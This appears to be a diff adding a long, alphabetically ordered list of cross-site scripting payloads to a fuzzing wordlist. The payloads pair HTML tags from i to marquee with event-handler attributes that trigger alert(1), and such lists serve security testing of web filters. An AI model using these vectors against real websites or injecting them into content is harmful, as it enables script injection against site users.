+<i onmouseout="alert(1)">test</i> +<i onmouseover="alert(1)">test</i> +<i onmouseup="alert(1)">test</i> +<i onpaste="alert(1)" contenteditable>test</i> +<iframe draggable="true" ondrag="alert(1)">test</iframe> +<iframe draggable="true" ondragend="alert(1)">test</iframe> +<iframe draggable="true" ondragenter="alert(1)">test</iframe> +<iframe draggable="true" ondragleave="alert(1)">test</iframe> +<iframe draggable="true" ondragstart="alert(1)">test</iframe> +<iframe id=x onfocus=alert(1)> +<iframe id=x onfocusin=alert(1)> +<iframe id=x tabindex=1 onactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe> +<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus> +<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus> +<iframe onbeforecopy="alert(1)" contenteditable>test</iframe> +<iframe onbeforecut="alert(1)" contenteditable>test</iframe> +<iframe onbeforepaste="alert(1)" contenteditable>test</iframe> +<iframe onblur=alert(1) id=x><input autofocus> +<iframe onclick="alert(1)">test</iframe> +<iframe oncontextmenu="alert(1)">test</iframe> +<iframe oncopy="alert(1)" contenteditable>test</iframe> +<iframe oncut="alert(1)" contenteditable>test</iframe> +<iframe ondblclick="alert(1)">test</iframe> +<iframe onfocusout=alert(1) id=x><input autofocus> +<iframe onkeydown="alert(1)" contenteditable>test</iframe> +<iframe onkeypress="alert(1)" contenteditable>test</iframe> +<iframe onkeyup="alert(1)" contenteditable>test</iframe> +<iframe onload=alert(1)></iframe> +<iframe onmousedown="alert(1)">test</iframe> +<iframe onmouseenter="alert(1)">test</iframe> +<iframe onmouseleave="alert(1)">test</iframe> +<iframe onmousemove="alert(1)">test</iframe> +<iframe onmouseout="alert(1)">test</iframe> +<iframe onmouseover="alert(1)">test</iframe> +<iframe onmouseup="alert(1)">test</iframe> +<iframe onpaste="alert(1)" contenteditable>test</iframe> +<iframe onreadystatechange=alert(1)></iframe> +<image draggable="true" ondrag="alert(1)">test</image> +<image draggable="true" ondragend="alert(1)">test</image> +<image draggable="true" ondragenter="alert(1)">test</image> +<image draggable="true" ondragleave="alert(1)">test</image> +<image draggable="true" ondragstart="alert(1)">test</image> +<image id=x tabindex=1 onactivate=alert(1)></image> +<image id=x tabindex=1 onbeforeactivate=alert(1)></image> +<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus> +<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus> +<image id=x tabindex=1 onfocus=alert(1)></image> +<image id=x tabindex=1 onfocusin=alert(1)></image> +<image onbeforecopy="alert(1)" contenteditable>test</image> +<image onbeforecut="alert(1)" contenteditable>test</image> +<image onbeforepaste="alert(1)" contenteditable>test</image> +<image onblur=alert(1) tabindex=1 id=x></image><input autofocus> +<image onclick="alert(1)">test</image> +<image oncontextmenu="alert(1)">test</image> +<image oncopy="alert(1)" contenteditable>test</image> +<image oncut="alert(1)" contenteditable>test</image> +<image ondblclick="alert(1)">test</image> +<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus> +<image onkeydown="alert(1)" contenteditable>test</image> +<image onkeypress="alert(1)" contenteditable>test</image> +<image onkeyup="alert(1)" contenteditable>test</image> +<image onmousedown="alert(1)">test</image> +<image onmouseenter="alert(1)">test</image> +<image onmouseleave="alert(1)">test</image> +<image onmousemove="alert(1)">test</image> +<image onmouseout="alert(1)">test</image> +<image onmouseover="alert(1)">test</image> +<image onmouseup="alert(1)">test</image> +<image onpaste="alert(1)" contenteditable>test</image> +<image src/onerror=alert(1)> +<image src=validimage.png onload=alert(1)> +<image src=validimage.png onloadend=alert(1)> +<image src=validimage.png onloadstart=alert(1)> +<image srcset=1 onerror=alert(1)> +<img draggable="true" ondrag="alert(1)">test</img> +<img draggable="true" ondragend="alert(1)">test</img> +<img draggable="true" ondragenter="alert(1)">test</img> +<img draggable="true" ondragleave="alert(1)">test</img> +<img draggable="true" ondragstart="alert(1)">test</img> +<img id=x tabindex=1 onactivate=alert(1)></img> +<img id=x tabindex=1 onbeforeactivate=alert(1)></img> +<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus> +<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus> +<img id=x tabindex=1 onfocus=alert(1)></img> +<img id=x tabindex=1 onfocusin=alert(1)></img> +<img onbeforecopy="alert(1)" contenteditable>test</img> +<img onbeforecut="alert(1)" contenteditable>test</img> +<img onbeforepaste="alert(1)" contenteditable>test</img> +<img onblur=alert(1) tabindex=1 id=x></img><input autofocus> +<img onclick="alert(1)">test</img> +<img oncontextmenu="alert(1)">test</img> +<img oncopy="alert(1)" contenteditable>test</img> +<img oncut="alert(1)" contenteditable>test</img> +<img ondblclick="alert(1)">test</img> +<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus> +<img onkeydown="alert(1)" contenteditable>test</img> +<img onkeypress="alert(1)" contenteditable>test</img> +<img onkeyup="alert(1)" contenteditable>test</img> +<img onmousedown="alert(1)">test</img> +<img onmouseenter="alert(1)">test</img> +<img onmouseleave="alert(1)">test</img> +<img onmousemove="alert(1)">test</img> +<img onmouseout="alert(1)">test</img> +<img onmouseover="alert(1)">test</img> +<img onmouseup="alert(1)">test</img> +<img onpaste="alert(1)" contenteditable>test</img> +<img src/onerror=alert(1)> +<img src=validimage.png onload=alert(1)> +<img src=validimage.png onloadend=alert(1)> +<img src=validimage.png onloadstart=alert(1)> +<img srcset=1 onerror=alert(1)> +<img srcset=validimage.png onload=alert(1)> +<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x> +<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x> +<input autofocus onfocus=alert(1)> +<input autofocus onfocusin=alert(1)> +<input draggable="true" ondrag="alert(1)">test</input> +<input draggable="true" ondragend="alert(1)">test</input> +<input draggable="true" ondragenter="alert(1)">test</input> +<input draggable="true" ondragleave="alert(1)">test</input> +<input draggable="true" ondragstart="alert(1)">test</input> +<input id=x onfocus=alert(1)> +<input id=x onfocusin=alert(1)> +<input id=x tabindex=1 onactivate=alert(1)></input> +<input id=x tabindex=1 onbeforeactivate=alert(1)></input> +<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus> +<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus> +<input onauxclick=alert(1)> +<input onbeforecopy=alert(1) value="XSS" autofocus> +<input onbeforecut=alert(1) value="XSS" autofocus> +<input onbeforepaste=alert(1) value="" autofocus> +<input onblur=alert(1) id=x><input autofocus> +<input onchange=alert(1) value=xss> +<input onclick="alert(1)">test</input> +<input oncontextmenu="alert(1)">test</input> +<input oncopy=alert(1) value="XSS" autofocus> +<input oncut=alert(1) value="XSS" autofocus> +<input ondblclick="alert(1)">test</input> +<input onfocusout=alert(1) id=x><input autofocus> +<input oninput=alert(1) value=xss> +<input onkeydown="alert(1)" contenteditable>test</input> +<input onkeypress="alert(1)" contenteditable>test</input> +<input onkeyup="alert(1)" contenteditable>test</input> +<input onmousedown="alert(1)">test</input> +<input onmouseenter="alert(1)">test</input> +<input onmouseleave="alert(1)">test</input> +<input onmousemove="alert(1)">test</input> +<input onmouseout="alert(1)">test</input> +<input onmouseover="alert(1)">test</input> +<input onmouseup="alert(1)">test</input> +<input onpaste=alert(1) value="" autofocus> +<input onselect=alert(1) value="XSS" autofocus> +<input type=checkbox id=x onfocus=alert(1)> +<input type=checkbox id=x onfocusin=alert(1)> +<input type=image onloadend=alert(1) src=validimage.png> +<input type=image onloadstart=alert(1) src=validimage.png> +<input type=image src=1 onerror=alert(1)> +<input type=image src=validimage.png onload=alert(1)> +<input type=radio id=x onfocus=alert(1)> +<input type=radio id=x onfocusin=alert(1)> +<ins draggable="true" ondrag="alert(1)">test</ins> +<ins draggable="true" ondragend="alert(1)">test</ins> +<ins draggable="true" ondragenter="alert(1)">test</ins> +<ins draggable="true" ondragleave="alert(1)">test</ins> +<ins draggable="true" ondragstart="alert(1)">test</ins> +<ins id=x tabindex=1 onactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins> +<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus> +<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus> +<ins id=x tabindex=1 onfocus=alert(1)></ins> +<ins id=x tabindex=1 onfocusin=alert(1)></ins> +<ins onbeforecopy="alert(1)" contenteditable>test</ins> +<ins onbeforecut="alert(1)" contenteditable>test</ins> +<ins onbeforepaste="alert(1)" contenteditable>test</ins> +<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onclick="alert(1)">test</ins> +<ins oncontextmenu="alert(1)">test</ins> +<ins oncopy="alert(1)" contenteditable>test</ins> +<ins oncut="alert(1)" contenteditable>test</ins> +<ins ondblclick="alert(1)">test</ins> +<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus> +<ins onkeydown="alert(1)" contenteditable>test</ins> +<ins onkeypress="alert(1)" contenteditable>test</ins> +<ins onkeyup="alert(1)" contenteditable>test</ins> +<ins onmousedown="alert(1)">test</ins> +<ins onmouseenter="alert(1)">test</ins> +<ins onmouseleave="alert(1)">test</ins> +<ins onmousemove="alert(1)">test</ins> +<ins onmouseout="alert(1)">test</ins> +<ins onmouseover="alert(1)">test</ins> +<ins onmouseup="alert(1)">test</ins> +<ins onpaste="alert(1)" contenteditable>test</ins> +<isindex draggable="true" ondrag="alert(1)">test</isindex> +<isindex draggable="true" ondragend="alert(1)">test</isindex> +<isindex draggable="true" ondragenter="alert(1)">test</isindex> +<isindex draggable="true" ondragleave="alert(1)">test</isindex> +<isindex draggable="true" ondragstart="alert(1)">test</isindex> +<isindex id=x tabindex=1 onactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex> +<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus> +<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus> +<isindex id=x tabindex=1 onfocus=alert(1)></isindex> +<isindex id=x tabindex=1 onfocusin=alert(1)></isindex> +<isindex onbeforecopy="alert(1)" contenteditable>test</isindex> +<isindex onbeforecut="alert(1)" contenteditable>test</isindex> +<isindex onbeforepaste="alert(1)" contenteditable>test</isindex> +<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onclick="alert(1)">test</isindex> +<isindex oncontextmenu="alert(1)">test</isindex> +<isindex oncopy="alert(1)" contenteditable>test</isindex> +<isindex oncut="alert(1)" contenteditable>test</isindex> +<isindex ondblclick="alert(1)">test</isindex> +<isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus> +<isindex onkeydown="alert(1)" contenteditable>test</isindex> +<isindex onkeypress="alert(1)" contenteditable>test</isindex> +<isindex onkeyup="alert(1)" contenteditable>test</isindex> +<isindex onmousedown="alert(1)">test</isindex> +<isindex onmouseenter="alert(1)">test</isindex> +<isindex onmouseleave="alert(1)">test</isindex> +<isindex onmousemove="alert(1)">test</isindex> +<isindex onmouseout="alert(1)">test</isindex> +<isindex onmouseover="alert(1)">test</isindex> +<isindex onmouseup="alert(1)">test</isindex> +<isindex onpaste="alert(1)" contenteditable>test</isindex> +<isindex type=image onload=alert(1) src=validimage.png> +<isindex type=image src=1 onerror=alert(1)> +<kbd draggable="true" ondrag="alert(1)">test</kbd> +<kbd draggable="true" ondragend="alert(1)">test</kbd> +<kbd draggable="true" ondragenter="alert(1)">test</kbd> +<kbd draggable="true" ondragleave="alert(1)">test</kbd> +<kbd draggable="true" ondragstart="alert(1)">test</kbd> +<kbd id=x tabindex=1 onactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd> +<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus> +<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus> +<kbd id=x tabindex=1 onfocus=alert(1)></kbd> +<kbd id=x tabindex=1 onfocusin=alert(1)></kbd> +<kbd onbeforecopy="alert(1)" contenteditable>test</kbd> +<kbd onbeforecut="alert(1)" contenteditable>test</kbd> +<kbd onbeforepaste="alert(1)" contenteditable>test</kbd> +<kbd onblur=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onclick="alert(1)">test</kbd> +<kbd oncontextmenu="alert(1)">test</kbd> +<kbd oncopy="alert(1)" contenteditable>test</kbd> +<kbd oncut="alert(1)" contenteditable>test</kbd> +<kbd ondblclick="alert(1)">test</kbd> +<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus> +<kbd onkeydown="alert(1)" contenteditable>test</kbd> +<kbd onkeypress="alert(1)" contenteditable>test</kbd> +<kbd onkeyup="alert(1)" contenteditable>test</kbd> +<kbd onmousedown="alert(1)">test</kbd> +<kbd onmouseenter="alert(1)">test</kbd> +<kbd onmouseleave="alert(1)">test</kbd> +<kbd onmousemove="alert(1)">test</kbd> +<kbd onmouseout="alert(1)">test</kbd> +<kbd onmouseover="alert(1)">test</kbd> +<kbd onmouseup="alert(1)">test</kbd> +<kbd onpaste="alert(1)" contenteditable>test</kbd> +<keygen autofocus onfocus=alert(1)> +<keygen autofocus onfocusin=alert(1)> +<keygen draggable="true" ondrag="alert(1)">test</keygen> +<keygen draggable="true" ondragend="alert(1)">test</keygen> +<keygen draggable="true" ondragenter="alert(1)">test</keygen> +<keygen draggable="true" ondragleave="alert(1)">test</keygen> +<keygen draggable="true" ondragstart="alert(1)">test</keygen> +<keygen id=x onfocus=alert(1)> +<keygen id=x onfocusin=alert(1)> +<keygen id=x tabindex=1 onactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen> +<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus> +<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus> +<keygen onbeforecopy="alert(1)" contenteditable>test</keygen> +<keygen onbeforecut="alert(1)" contenteditable>test</keygen> +<keygen onbeforepaste="alert(1)" contenteditable>test</keygen> +<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onclick="alert(1)">test</keygen> +<keygen oncontextmenu="alert(1)">test</keygen> +<keygen oncopy="alert(1)" contenteditable>test</keygen> +<keygen oncut="alert(1)" contenteditable>test</keygen> +<keygen ondblclick="alert(1)">test</keygen> +<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus> +<keygen onkeydown="alert(1)" contenteditable>test</keygen> +<keygen onkeypress="alert(1)" contenteditable>test</keygen> +<keygen onkeyup="alert(1)" contenteditable>test</keygen> +<keygen onmousedown="alert(1)">test</keygen> +<keygen onmouseenter="alert(1)">test</keygen> +<keygen onmouseleave="alert(1)">test</keygen> +<keygen onmousemove="alert(1)">test</keygen> +<keygen onmouseout="alert(1)">test</keygen> +<keygen onmouseover="alert(1)">test</keygen> +<keygen onmouseup="alert(1)">test</keygen> +<keygen onpaste="alert(1)" contenteditable>test</keygen> +<label draggable="true" ondrag="alert(1)">test</label> +<label draggable="true" ondragend="alert(1)">test</label> +<label draggable="true" ondragenter="alert(1)">test</label> +<label draggable="true" ondragleave="alert(1)">test</label> +<label draggable="true" ondragstart="alert(1)">test</label> +<label id=x tabindex=1 onactivate=alert(1)></label> +<label id=x tabindex=1 onbeforeactivate=alert(1)></label> +<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus> +<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus> +<label id=x tabindex=1 onfocus=alert(1)></label> +<label id=x tabindex=1 onfocusin=alert(1)></label> +<label onbeforecopy="alert(1)" contenteditable>test</label> +<label onbeforecut="alert(1)" contenteditable>test</label> +<label onbeforepaste="alert(1)" contenteditable>test</label> +<label onblur=alert(1) tabindex=1 id=x></label><input autofocus> +<label onclick="alert(1)">test</label> +<label oncontextmenu="alert(1)">test</label> +<label oncopy="alert(1)" contenteditable>test</label> +<label oncut="alert(1)" contenteditable>test</label> +<label ondblclick="alert(1)">test</label> +<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus> +<label onkeydown="alert(1)" contenteditable>test</label> +<label onkeypress="alert(1)" contenteditable>test</label> +<label onkeyup="alert(1)" contenteditable>test</label> +<label onmousedown="alert(1)">test</label> +<label onmouseenter="alert(1)">test</label> +<label onmouseleave="alert(1)">test</label> +<label onmousemove="alert(1)">test</label> +<label onmouseout="alert(1)">test</label> +<label onmouseover="alert(1)">test</label> +<label onmouseup="alert(1)">test</label> +<label onpaste="alert(1)" contenteditable>test</label> +<legend draggable="true" ondrag="alert(1)">test</legend> +<legend draggable="true" ondragend="alert(1)">test</legend> +<legend draggable="true" ondragenter="alert(1)">test</legend> +<legend draggable="true" ondragleave="alert(1)">test</legend> +<legend draggable="true" ondragstart="alert(1)">test</legend> +<legend id=x tabindex=1 onactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend> +<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus> +<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus> +<legend id=x tabindex=1 onfocus=alert(1)></legend> +<legend id=x tabindex=1 onfocusin=alert(1)></legend> +<legend onbeforecopy="alert(1)" contenteditable>test</legend> +<legend onbeforecut="alert(1)" contenteditable>test</legend> +<legend onbeforepaste="alert(1)" contenteditable>test</legend> +<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onclick="alert(1)">test</legend> +<legend oncontextmenu="alert(1)">test</legend> +<legend oncopy="alert(1)" contenteditable>test</legend> +<legend oncut="alert(1)" contenteditable>test</legend> +<legend ondblclick="alert(1)">test</legend> +<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus> +<legend onkeydown="alert(1)" contenteditable>test</legend> +<legend onkeypress="alert(1)" contenteditable>test</legend> +<legend onkeyup="alert(1)" contenteditable>test</legend> +<legend onmousedown="alert(1)">test</legend> +<legend onmouseenter="alert(1)">test</legend> +<legend onmouseleave="alert(1)">test</legend> +<legend onmousemove="alert(1)">test</legend> +<legend onmouseout="alert(1)">test</legend> +<legend onmouseover="alert(1)">test</legend> +<legend onmouseup="alert(1)">test</legend> +<legend onpaste="alert(1)" contenteditable>test</legend> +<li draggable="true" ondrag="alert(1)">test</li> +<li draggable="true" ondragend="alert(1)">test</li> +<li draggable="true" ondragenter="alert(1)">test</li> +<li draggable="true" ondragleave="alert(1)">test</li> +<li draggable="true" ondragstart="alert(1)">test</li> +<li id=x tabindex=1 onactivate=alert(1)></li> +<li id=x tabindex=1 onbeforeactivate=alert(1)></li> +<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus> +<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus> +<li id=x tabindex=1 onfocus=alert(1)></li> +<li id=x tabindex=1 onfocusin=alert(1)></li> +<li onbeforecopy="alert(1)" contenteditable>test</li> +<li onbeforecut="alert(1)" contenteditable>test</li> +<li onbeforepaste="alert(1)" contenteditable>test</li> +<li onblur=alert(1) tabindex=1 id=x></li><input autofocus> +<li onclick="alert(1)">test</li> +<li oncontextmenu="alert(1)">test</li> +<li oncopy="alert(1)" contenteditable>test</li> +<li oncut="alert(1)" contenteditable>test</li> +<li ondblclick="alert(1)">test</li> +<li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus> +<li onkeydown="alert(1)" contenteditable>test</li> +<li onkeypress="alert(1)" contenteditable>test</li> +<li onkeyup="alert(1)" contenteditable>test</li> +<li onmousedown="alert(1)">test</li> +<li onmouseenter="alert(1)">test</li> +<li onmouseleave="alert(1)">test</li> +<li onmousemove="alert(1)">test</li> +<li onmouseout="alert(1)">test</li> +<li onmouseover="alert(1)">test</li> +<li onmouseup="alert(1)">test</li> +<li onpaste="alert(1)" contenteditable>test</li> +<link draggable="true" ondrag="alert(1)">test</link> +<link draggable="true" ondragend="alert(1)">test</link> +<link draggable="true" ondragenter="alert(1)">test</link> +<link draggable="true" ondragleave="alert(1)">test</link> +<link draggable="true" ondragstart="alert(1)">test</link> +<link href=validstyles.css rel=stylesheet onload=alert(1)> +<link id=x tabindex=1 onactivate=alert(1)></link> +<link id=x tabindex=1 onbeforeactivate=alert(1)></link> +<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus> +<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus> +<link onbeforecopy="alert(1)" contenteditable>test</link> +<link onbeforecut="alert(1)" contenteditable>test</link> +<link onbeforepaste="alert(1)" contenteditable>test</link> +<link onblur=alert(1) tabindex=1 id=x></link><input autofocus> +<link onclick="alert(1)">test</link> +<link oncontextmenu="alert(1)">test</link> +<link oncopy="alert(1)" contenteditable>test</link> +<link oncut="alert(1)" contenteditable>test</link> +<link ondblclick="alert(1)">test</link> +<link onfocus=alert(1) id=x tabindex=1 style=display:block> +<link onfocusin=alert(1) id=x tabindex=1 style=display:block> +<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus> +<link onkeydown="alert(1)" contenteditable>test</link> +<link onkeypress="alert(1)" contenteditable>test</link> +<link onkeyup="alert(1)" contenteditable>test</link> +<link onmousedown="alert(1)">test</link> +<link onmouseenter="alert(1)">test</link> +<link onmouseleave="alert(1)">test</link> +<link onmousemove="alert(1)">test</link> +<link onmouseout="alert(1)">test</link> +<link onmouseover="alert(1)">test</link> +<link onmouseup="alert(1)">test</link> +<link onpaste="alert(1)" contenteditable>test</link> +<link onreadystatechange=alert(1) rel=stylesheet href=1> +<link rel=stylesheet href=1 onerror=alert(1)> +<listing draggable="true" ondrag="alert(1)">test</listing> +<listing draggable="true" ondragend="alert(1)">test</listing> +<listing draggable="true" ondragenter="alert(1)">test</listing> +<listing draggable="true" ondragleave="alert(1)">test</listing> +<listing draggable="true" ondragstart="alert(1)">test</listing> +<listing id=x tabindex=1 onactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing> +<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus> +<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus> +<listing id=x tabindex=1 onfocus=alert(1)></listing> +<listing id=x tabindex=1 onfocusin=alert(1)></listing> +<listing onbeforecopy="alert(1)" contenteditable>test</listing> +<listing onbeforecut="alert(1)" contenteditable>test</listing> +<listing onbeforepaste="alert(1)" contenteditable>test</listing> +<listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onclick="alert(1)">test</listing> +<listing oncontextmenu="alert(1)">test</listing> +<listing oncopy="alert(1)" contenteditable>test</listing> +<listing oncut="alert(1)" contenteditable>test</listing> +<listing ondblclick="alert(1)">test</listing> +<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus> +<listing onkeydown="alert(1)" contenteditable>test</listing> +<listing onkeypress="alert(1)" contenteditable>test</listing> +<listing onkeyup="alert(1)" contenteditable>test</listing> +<listing onmousedown="alert(1)">test</listing> +<listing onmouseenter="alert(1)">test</listing> +<listing onmouseleave="alert(1)">test</listing> +<listing onmousemove="alert(1)">test</listing> +<listing onmouseout="alert(1)">test</listing> +<listing onmouseover="alert(1)">test</listing> +<listing onmouseup="alert(1)">test</listing> +<listing onpaste="alert(1)" contenteditable>test</listing> +<main draggable="true" ondrag="alert(1)">test</main> +<main draggable="true" ondragend="alert(1)">test</main> +<main draggable="true" ondragenter="alert(1)">test</main> +<main draggable="true" ondragleave="alert(1)">test</main> +<main draggable="true" ondragstart="alert(1)">test</main> +<main id=x tabindex=1 onactivate=alert(1)></main> +<main id=x tabindex=1 onbeforeactivate=alert(1)></main> +<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus> +<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus> +<main id=x tabindex=1 onfocus=alert(1)></main> +<main id=x tabindex=1 onfocusin=alert(1)></main> +<main onbeforecopy="alert(1)" contenteditable>test</main> +<main onbeforecut="alert(1)" contenteditable>test</main> +<main onbeforepaste="alert(1)" contenteditable>test</main> +<main onblur=alert(1) tabindex=1 id=x></main><input autofocus> +<main onclick="alert(1)">test</main> +<main oncontextmenu="alert(1)">test</main> +<main oncopy="alert(1)" contenteditable>test</main> +<main oncut="alert(1)" contenteditable>test</main> +<main ondblclick="alert(1)">test</main> +<main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus> +<main onkeydown="alert(1)" contenteditable>test</main> +<main onkeypress="alert(1)" contenteditable>test</main> +<main onkeyup="alert(1)" contenteditable>test</main> +<main onmousedown="alert(1)">test</main> +<main onmouseenter="alert(1)">test</main> +<main onmouseleave="alert(1)">test</main> +<main onmousemove="alert(1)">test</main> +<main onmouseout="alert(1)">test</main> +<main onmouseover="alert(1)">test</main> +<main onmouseup="alert(1)">test</main> +<main onpaste="alert(1)" contenteditable>test</main> +<map draggable="true" ondrag="alert(1)">test</map> +<map draggable="true" ondragend="alert(1)">test</map> +<map draggable="true" ondragenter="alert(1)">test</map> +<map draggable="true" ondragleave="alert(1)">test</map> +<map draggable="true" ondragstart="alert(1)">test</map> +<map id=x tabindex=1 onactivate=alert(1)></map> +<map id=x tabindex=1 onbeforeactivate=alert(1)></map> +<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus> +<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus> +<map id=x tabindex=1 onfocus=alert(1)></map> +<map id=x tabindex=1 onfocusin=alert(1)></map> +<map onbeforecopy="alert(1)" contenteditable>test</map> +<map onbeforecut="alert(1)" contenteditable>test</map> +<map onbeforepaste="alert(1)" contenteditable>test</map> +<map onblur=alert(1) tabindex=1 id=x></map><input autofocus> +<map onclick="alert(1)">test</map> +<map oncontextmenu="alert(1)">test</map> +<map oncopy="alert(1)" contenteditable>test</map> +<map oncut="alert(1)" contenteditable>test</map> +<map ondblclick="alert(1)">test</map> +<map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus> +<map onkeydown="alert(1)" contenteditable>test</map> +<map onkeypress="alert(1)" contenteditable>test</map> +<map onkeyup="alert(1)" contenteditable>test</map> +<map onmousedown="alert(1)">test</map> +<map onmouseenter="alert(1)">test</map> +<map onmouseleave="alert(1)">test</map> +<map onmousemove="alert(1)">test</map> +<map onmouseout="alert(1)">test</map> +<map onmouseover="alert(1)">test</map> +<map onmouseup="alert(1)">test</map> +<map onpaste="alert(1)" contenteditable>test</map> +<mark draggable="true" ondrag="alert(1)">test</mark> +<mark draggable="true" ondragend="alert(1)">test</mark> +<mark draggable="true" ondragenter="alert(1)">test</mark> +<mark draggable="true" ondragleave="alert(1)">test</mark> +<mark draggable="true" ondragstart="alert(1)">test</mark> +<mark id=x tabindex=1 onactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark> +<mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus> +<mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus> +<mark id=x tabindex=1 onfocus=alert(1)></mark> +<mark id=x tabindex=1 onfocusin=alert(1)></mark> +<mark onbeforecopy="alert(1)" contenteditable>test</mark> +<mark onbeforecut="alert(1)" contenteditable>test</mark> +<mark onbeforepaste="alert(1)" contenteditable>test</mark> +<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onclick="alert(1)">test</mark> +<mark oncontextmenu="alert(1)">test</mark> +<mark oncopy="alert(1)" contenteditable>test</mark> +<mark oncut="alert(1)" contenteditable>test</mark> +<mark ondblclick="alert(1)">test</mark> +<mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus> +<mark onkeydown="alert(1)" contenteditable>test</mark> +<mark onkeypress="alert(1)" contenteditable>test</mark> +<mark onkeyup="alert(1)" contenteditable>test</mark> +<mark onmousedown="alert(1)">test</mark> +<mark onmouseenter="alert(1)">test</mark> +<mark onmouseleave="alert(1)">test</mark> +<mark onmousemove="alert(1)">test</mark> +<mark onmouseout="alert(1)">test</mark> +<mark onmouseover="alert(1)">test</mark> +<mark onmouseup="alert(1)">test</mark> +<mark onpaste="alert(1)" contenteditable>test</mark> +<marquee draggable="true" ondrag="alert(1)">test</marquee> +<marquee draggable="true" ondragend="alert(1)">test</marquee> +<marquee draggable="true" ondragenter="alert(1)">test</marquee> +<marquee draggable="true" ondragleave="alert(1)">test</marquee> +<marquee draggable="true" ondragstart="alert(1)">test</marquee> +<marquee id=x tabindex=1 onactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee> +<marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus> +<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus> +<marquee id=x tabindex=1 onfocus=alert(1)></marquee> +<marquee id=x tabindex=1 onfocusin=alert(1)></marquee> +<marquee onbeforecopy="alert(1)" contenteditable>test</marquee> +<marquee onbeforecut="alert(1)" contenteditable>test</marquee> +<marquee onbeforepaste="alert(1)" contenteditable>test</marquee> +<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onclick="alert(1)">test</marquee> +<marquee oncontextmenu="alert(1)">test</marquee> +<marquee oncopy="alert(1)" contenteditable>test</marquee> +<marquee oncut="alert(1)" contenteditable>test</marquee> +<marquee ondblclick="alert(1)">test</marquee> +<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus> +<marquee onkeydown="alert(1)" contenteditable>test</marquee> +<marquee onkeypress="alert(1)" contenteditable>test</marquee> +<marquee onkeyup="alert(1)" contenteditable>test</marquee> +<marquee onmousedown="alert(1)">test</marquee> +<marquee onmouseenter="alert(1)">test</marquee> +<marquee onmouseleave="alert(1)">test</marquee> +<marquee onmousemove="alert(1)">test</marquee> +<marquee onmouseout="alert(1)">test</marquee> +<marquee onmouseover="alert(1)">test</marquee> 